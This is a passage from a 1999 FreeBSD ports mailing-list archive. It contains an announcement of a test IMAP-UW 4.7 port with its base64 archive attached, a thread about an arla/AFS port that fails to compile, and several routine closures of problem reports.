jM5Kb7QeGglddKS1E/7f0bxQUbF6nuz9Nna4u+jpWXyt1/a+c1yfwB/WXjfh AC8m/+0C9Ch2YJM4CBPihg2jwGJxLH9bimDP7WX2RymC/akUcbx9m/Smo9l9 lCL04xNR4ZGNbIlcQWcrOhJqXVA6PaXdU1oPzkJHTI9n1bqFpNHlB4NuM99E hEgx9ZpJint6OhhPjNVyNJjCK8ra5u7sx5wGjb0LEzjl6PUVnpJqopXcJgci Ogvxx02nXuBjRLJ1uqHRqqClCoNlJc6ErFOHs/4bfuqvcJEu9+kmItiG+cFN XNNz/0cknld1Hjr8EZNGZbfa1LpHq/g9DZHmKx1pkMj1EwdOK/8eV2pIQwrg 4Yi0gtNsLUiXa7rvg/uDomM/YZFjYuxRQA7zh9OkIS/uqsAB6j5T4bQpyarA NN7AKWIBkWVNPNL4TLQD37vDjpfyy7Nehc+IMCew76SfkjvEZ30gcL5CQCqG XiUMt2kfXn5RXool3NDREU6F1iT37IzWXN2PHNZ0GAX6wbMR7/pV+Q36fa7C fqwwqopRnBAPcBgcVz/uaeghORVwwsynpFmtIvNFcHvoek1He+h4GO3kBuEc mVV+HZr+ywQCBEl4nPP97H0m2tb07zCLR1gZfsttQk9LL+n1ziUCIeYhE5z+ R+bIo2EyHg7RhTv1np8Ano9EYSxxH/4oiPnif3A4JdLU6F3TZDVdTEazGq7X dv29kSOWpBFW9Q+TCQ+h+4KE0xA9RebZRkLMyy/+S+T8oc/pcxGvwoNDDwIy wcgnwvCZZHe1qZ+PjOHykI7ynsfpLR/huYJwSPbgSO+p/B115zivHZEfUove 6TXbxedMTUpoTQ4BV3R8xz/K1PRSTY/YtZq5EhzcqHzkg+/yop/cQeDAp8ML ubI0Fs9pbcQ0DNamdXWDjViyAlQqcQmYnJreLoiTM1jMFxoHHdhoZHNgUage idhTZ7JsLgtTNZf1jAgC8PkuEG8KDj+cxTbZLvCPqRoPqBo5FTeSVsOjCEFl /pCFPysiOpFtgSA75/ODGxPrHURBkNB94ciXn6T2c4lGWTyB+pOy+EsUkkUN ev/+OavHpoeoIQdUzEY5WKkjqLPEqpOdXMqCp4g0PzPPC25gYW5YXCtLM5aM fSeoARLKQP9fcG16mCXPSE7ENm6MOZSCgBJHJge3VGphVox76DyBD8hHmLxs QotPvGXL3tORHJ/TH6lr2gQlWLnqBKQbvY2jRMaz9mEVobmT6RVkj5aNpoTi j6p062hHPtA4GlAVMZBbfT+gN2igVPqVRkRUCRr+FEs8zzJ3jP+rBJgbLHq/ latEwc9npfx/MUqolzi9xUGpVEqiu0vHxTPTZWjGcc5gWUHqJ9/Kg2v4rjk4 /XdN8Xxuyl7GHCWVrO/J/JSNfSPyKjAc56im0tMfgy5xLOvDX/r7p2PW5887 fz9cH0Rq9f9NxPzlXng+BPn/LhzFDO95Mvz4yDe+jdmTF9/iYW3s9BqNQnlU ag16+1ATz6WPMm/hlpeZ43vM7dWjx2fl/wVKhT+upCYAAA== --0-888792416-945861049=:94176-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 22 3:25:14 1999 Delivered-To: freebsd-ports@freebsd.org Received: from ady.warpnet.ro (ady.warpnet.ro [194.102.224.1]) by hub.freebsd.org (Postfix) with ESMTP id 098A0154EB; Wed, 22 Dec 1999 03:25:00 -0800 (PST) (envelope-from ady@freebsd.ady.ro) Received: from localhost (ady@localhost) by ady.warpnet.ro (8.9.3/8.9.3) with ESMTP id NAA94855; Wed, 22 Dec 1999 13:27:47 +0200 (EET) (envelope-from ady@freebsd.ady.ro) Date: Wed, 22 Dec 1999 13:27:47 +0200 (EET) From: Adrian Penisoara X-Sender: ady@ady.warpnet.ro To: FreeBSD ports , freebsd-security@FreeBSD.ORG Cc: Akinori MUSHA aka knu Subject: [Testing] New port: IMAP-UW version 4.7 Message-ID: MIME-Version: 1.0 Content-Type: MULTIPART/MIXED; BOUNDARY="0-742392593-945861777=:94176" Content-ID: Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mime@docserver.cac.washington.edu for more info. --0-742392593-945861777=:94176 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Content-ID: Hello, I'd like to ask interested testers to check out the attached IMAP-UW port and submit their feedback to imap-uw@freebsd.ady.ro. Some sidenotes: * you can build a version that uses PAM authentication by defining the variable PAMAUTH as "yes", like this: $ make PAMAUTH=yes Please be advised that when compiling in PAM you need to modify the /etc/pam.conf file (for details look in the pkg/MESSAGE or pkg/DESCR files). * the port uses an external mail SGID executable (root:mail, mode 2711) named "mlock", installed in ${PREFIX}/libexec and compiled from sources in ${WRKDIR}/mlock (that means work/mlock, not work/imap-4.7 !). I'd like to ask the security-aware people to "screen" the referenced sources for possible security compromises. Thank you very much! Ady (@freebsd.ady.ro) --0-742392593-945861777=:94176 Content-Type: APPLICATION/OCTET-STREAM; NAME="imap-uw-4.7.tar.gz" Content-Transfer-Encoding: BASE64 Content-ID: Content-Description: IMAP-UW 4.7 port archive Content-Disposition: ATTACHMENT; FILENAME="imap-uw-4.7.tar.gz" H4sIABVVYDgAA+08e3/bOI791/rdh8C4yTUvy5IsP2fdq+M4qad+5Gz3MTud X0aWaFsXWdJKch7XzXc/gJT8SJqm7TaZ3T2hsUSRIAmBIAiAVO254ecWl/ln jwigK+ViEZ4BqOWiSncEJb7HD1BWCopS1ArFEqIpekF5BsXHJCqBRRgZAcAz w7r+It7ljDHnKQh6WrDj8Z/YDgsfSQq+cvy1clErlUqYVtWirqfj/xSwOf5z 6zF4ripKSdfvH3+9UErGv6yUyoimaYXSM1AegZY78P98/LtHRdjhQqDLZRlZ If91F+pQLkyYMh7rlXKlUtarenFcNEpVzbLKmoLpijRs/7X1uYqgVko4kAVp s2HHM89zvhGZM0IlRFPD0S4zq1SYGJWCNh4rY6VUYpWxXrUYG49v93C3BexK 0TR9radFZDvhipbixNIqGiJVDWVSVVmxXFKYqRrjkl4olyfmehe3qkJZ0ypl 6c8enceHZP5zzj7SCvDV+l8taSVNp/mvlIqp/n8KuD3+/J4zxj+yjwf0f7Go q7H9hwZguYhoaAWqqf5/CsjlchAGZt4LLebnF659le8a54zMAdkL7GnmPbOg 513g0IGi15RiTa+AWq1Wpf39/ftq8kpHzARNA0Wp6YWaVhCVXr2CHFr3B2XY F7dXryQAazGfX8se+CFbWB4mXBbNwykmJk4YBbbLk9Yy+RHrBBOzommE60Y+ 3sI5v5E864FKjXl+IcYl4jA5H3vixq9za4K3iLmMP0ZXvN/LkKrO+OvDfEYX LJByzeNO42RY39o5bAxb4mEXtnZaH0aDRvwo7YvE/pexoNt406rPkVWYfFef X0gw6NaDOeSCieCPWj0oIX/wpiqCQaeN4fD90ejX0xa2vXrYheFpq9ludBpv R69bvVG72Rj1B8N6dmvnswW7WQkO37Y7R9gKUbEL44XtWEghz+2fjtr9HpEo 7T+HHsNBjGZ2CBMvwASDcGYEmOfY48AIriFYOAwiDy694BxMLwiYGTnX0r48 fHt83P7QGtYA2SeHnrQ/7B+3Oy1k36fDdq8xaGOZ7NWx6Ebal+A5vGYBA3sC LrIbGQNGMF3MmRsBw9k5duxwxiykCuZ2GKII1IALnTwT/CpXOL8q2oFa4vzK wIr/9WxuCrnD/CIM8kh5fmxP85A7uvBsq27iC2Ha9NwwqmOidzx803l7dNLK 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 QgoppJBCCimkkEIKKaSQwlPB/wEsdXZhAHgAAA== --0-742392593-945861777=:94176-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 22 4: 1:51 1999 Delivered-To: freebsd-ports@freebsd.org Received: from righi.dhs.org (RIGHI.DF.UNIBO.IT [137.204.49.17]) by hub.freebsd.org (Postfix) with ESMTP id 22D7D154BC; Wed, 22 Dec 1999 04:01:44 -0800 (PST) (envelope-from bsd@righi.dhs.org) Received: from localhost (bsd@localhost) by righi.dhs.org (8.9.3/8.9.3) with ESMTP id NAA85234; Wed, 22 Dec 1999 13:01:12 +0100 (CET) (envelope-from bsd@righi.dhs.org) Date: Wed, 22 Dec 1999 13:01:11 +0100 (CET) From: FreeBSD mailing list To: Sheldon Hearn Cc: thepish@freebsd.org, freebsd-ports@freebsd.org Subject: Re: ports/14833: update port: sfio In-Reply-To: <24146.945856319@axl.noc.iafrica.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, exactly I have errors in the compilation of the package, the package won;t compile. I also tryed downloading more recent version but it does nto compile. Have u ever tried teh arla port ? thanks bye Rick On Wed, 22 Dec 1999, Sheldon Hearn wrote: > > > On Wed, 22 Dec 1999 08:49:57 +0100, FreeBSD mailing list wrote: > > > I am talking of AFS arla port... it does not work on FreeBSD, very > > bad... because since I need AFS I was forced to use OpenBSD and > > repleace FreeBSD > > Have you tried installing the package? What exactly doesn't work (error > messages?) and what did you tell thepish@freebsd.org, who is the > maintainer of the port? > > Ciao, > Sheldon. > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 22 4: 4: 5 1999 Delivered-To: freebsd-ports@freebsd.org Received: from righi.dhs.org (RIGHI.DF.UNIBO.IT [137.204.49.17]) by hub.freebsd.org (Postfix) with ESMTP id 9861514E3B; Wed, 22 Dec 1999 04:03:43 -0800 (PST) (envelope-from bsd@righi.dhs.org) Received: from localhost (bsd@localhost) by righi.dhs.org (8.9.3/8.9.3) with ESMTP id NAA85244; Wed, 22 Dec 1999 13:03:32 +0100 (CET) (envelope-from bsd@righi.dhs.org) Date: Wed, 22 Dec 1999 13:03:32 +0100 (CET) From: FreeBSD mailing list To: Sheldon Hearn Cc: thepish@freebsd.org, freebsd-ports@freebsd.org Subject: Re: ports/14833: update port: sfio In-Reply-To: <24146.945856319@axl.noc.iafrica.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I have these errors this hapened 1 month ago xfs_vfsops-common.c: In function `xfs_mount_common': > > > xfs_vfsops-common.c:162: warning: implicit declaration of function > > > `getnewfsid' > > > xfs_vfsops-common.c:162: `MOUNT_AFS' undeclared (first use this function) > > > xfs_vfsops-common.c:162: (Each undeclared identifier is reported only once > > > xfs_vfsops-common.c:162: for each function it appears in.) so I Can't compile it. Does the new ports updated has a fix about it ? thanks ciao Rick On Wed, 22 Dec 1999, Sheldon Hearn wrote: > > > On Wed, 22 Dec 1999 08:49:57 +0100, FreeBSD mailing list wrote: > > > I am talking of AFS arla port... it does not work on FreeBSD, very > > bad... because since I need AFS I was forced to use OpenBSD and > > repleace FreeBSD > > Have you tried installing the package? What exactly doesn't work (error > messages?) and what did you tell thepish@freebsd.org, who is the > maintainer of the port? > > Ciao, > Sheldon. > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 22 4: 6:23 1999 Delivered-To: freebsd-ports@freebsd.org Received: from axl.noc.iafrica.com (axl.noc.iafrica.com [196.31.1.175]) by hub.freebsd.org (Postfix) with ESMTP id A1FCC15061; Wed, 22 Dec 1999 04:06:18 -0800 (PST) (envelope-from sheldonh@axl.noc.iafrica.com) Received: from sheldonh (helo=axl.noc.iafrica.com) by axl.noc.iafrica.com with local-esmtp (Exim 3.11 #1) id 120kXe-0007si-00; Wed, 22 Dec 1999 14:06:54 +0200 From: Sheldon Hearn To: FreeBSD mailing list Cc: thepish@freebsd.org, freebsd-ports@freebsd.org Subject: Re: ports/14833: update port: sfio In-reply-to: Your message of "Wed, 22 Dec 1999 13:01:11 +0100." Date: Wed, 22 Dec 1999 14:06:54 +0200 Message-ID: <30299.945864414@axl.noc.iafrica.com> Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 22 Dec 1999 13:01:11 +0100, FreeBSD mailing list wrote: > exactly I have errors in the compilation of the package, > the package won;t compile. No, I asked you whether you've tried installing the package that's already pre-compiled for you: ftp://ftp.freebsd.org/pub/FreeBSD/ports/i386/packages-3.4-release/All/arla-0.28.tgz > I also tryed downloading more recent version but it does nto compile. Did you actually read my message? I specifically asked for error messages. Saying it doesn't compile doesn't really help, especially when I know from the fact that the package is available that _someone's_ managed to compile it. :-) > Have u ever tried teh arla port ? No. Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 22 4: 8:28 1999 Delivered-To: freebsd-ports@freebsd.org Received: from axl.noc.iafrica.com (axl.noc.iafrica.com [196.31.1.175]) by hub.freebsd.org (Postfix) with ESMTP id 23364154AD; Wed, 22 Dec 1999 04:08:23 -0800 (PST) (envelope-from sheldonh@axl.noc.iafrica.com) Received: from sheldonh (helo=axl.noc.iafrica.com) by axl.noc.iafrica.com with local-esmtp (Exim 3.11 #1) id 120kZH-0007tK-00; Wed, 22 Dec 1999 14:08:35 +0200 From: Sheldon Hearn To: FreeBSD mailing list Cc: thepish@freebsd.org, freebsd-ports@freebsd.org Subject: Re: ports/14833: update port: sfio In-reply-to: Your message of "Wed, 22 Dec 1999 13:03:32 +0100." Date: Wed, 22 Dec 1999 14:08:35 +0200 Message-ID: <30337.945864515@axl.noc.iafrica.com> Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 22 Dec 1999 13:03:32 +0100, FreeBSD mailing list wrote: > xfs_vfsops-common.c: In function `xfs_mount_common': > > > > xfs_vfsops-common.c:162: warning: implicit declaration of function > > > > `getnewfsid' > > > > xfs_vfsops-common.c:162: `MOUNT_AFS' undeclared (first use this > function) > > > > xfs_vfsops-common.c:162: (Each undeclared identifier is reported > only > once > > > > xfs_vfsops-common.c:162: for each function it appears in.) Aha, error messages. Cool. :-) > so I Can't compile it. So either try the package or update your ports tree and see if it compiles now. Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 22 4:30: 3 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 6626B14F5B for ; Wed, 22 Dec 1999 04:30:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id EAA34814; Wed, 22 Dec 1999 04:30:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Wed, 22 Dec 1999 04:30:02 -0800 (PST) Message-Id: <199912221230.EAA34814@freefall.freebsd.org> To: freebsd-ports@FreeBSD.org Cc: From: Marcin Cieslak Subject: Re: ports/15613 Update dia port to 0.82 - broken Reply-To: Marcin Cieslak Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR ports/15613; it has been noted by GNATS. From: Marcin Cieslak To: FreeBSD-gnats-submit@freebsd.org Cc: Subject: Re: ports/15613 Update dia port to 0.82 - broken Date: Wed, 22 Dec 1999 13:22:16 +0100 (MET) The patch is broken, sorry. Need to change MASTER_SITES_SUBDIR to MASTER_SITE_SUBDIR. New patch will be out tomorrow, please close this. -- << Marcin Cieslak // saper@system.pl >> ----------------------------------------------------------------- SYSTEM Internet Provider http://www.system.pl To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 22 5:29:18 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id D27C514F78; Wed, 22 Dec 1999 05:29:17 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Received: (from jedgar@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id FAA39398; Wed, 22 Dec 1999 05:29:17 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Date: Wed, 22 Dec 1999 05:29:17 -0800 (PST) From: Message-Id: <199912221329.FAA39398@freefall.freebsd.org> To: ust@cert.siemens.de, jedgar@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15623: Build fails in ports/editors/staroffice5 with USE_CDROM Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Build fails in ports/editors/staroffice5 with USE_CDROM State-Changed-From-To: open->closed State-Changed-By: jedgar State-Changed-When: Wed Dec 22 05:28:30 PST 1999 State-Changed-Why: Duplicate of ports/15622. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 22 5:49:39 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 3036814E2B; Wed, 22 Dec 1999 05:49:21 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Received: (from jedgar@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id FAA41350; Wed, 22 Dec 1999 05:49:21 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Date: Wed, 22 Dec 1999 05:49:21 -0800 (PST) From: Message-Id: <199912221349.FAA41350@freefall.freebsd.org> To: tkato@prontomail.ne.jp, jedgar@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15498: Update port: archivers/lzo Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: archivers/lzo State-Changed-From-To: open->closed State-Changed-By: jedgar State-Changed-When: Wed Dec 22 05:45:03 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 22 6:34: 7 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 8ED0A14DB7; Wed, 22 Dec 1999 06:34:05 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Received: (from jedgar@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id GAA53699; Wed, 22 Dec 1999 06:34:05 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Date: Wed, 22 Dec 1999 06:34:05 -0800 (PST) From: Message-Id: <199912221434.GAA53699@freefall.freebsd.org> To: lkoeller@cc.fh-lippe.de, jedgar@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15522: Wrong Maintainer E-Mail in hp2xx and tclock ports (typo) Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Wrong Maintainer E-Mail in hp2xx and tclock ports (typo) State-Changed-From-To: open->closed State-Changed-By: jedgar State-Changed-When: Wed Dec 22 06:31:59 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send 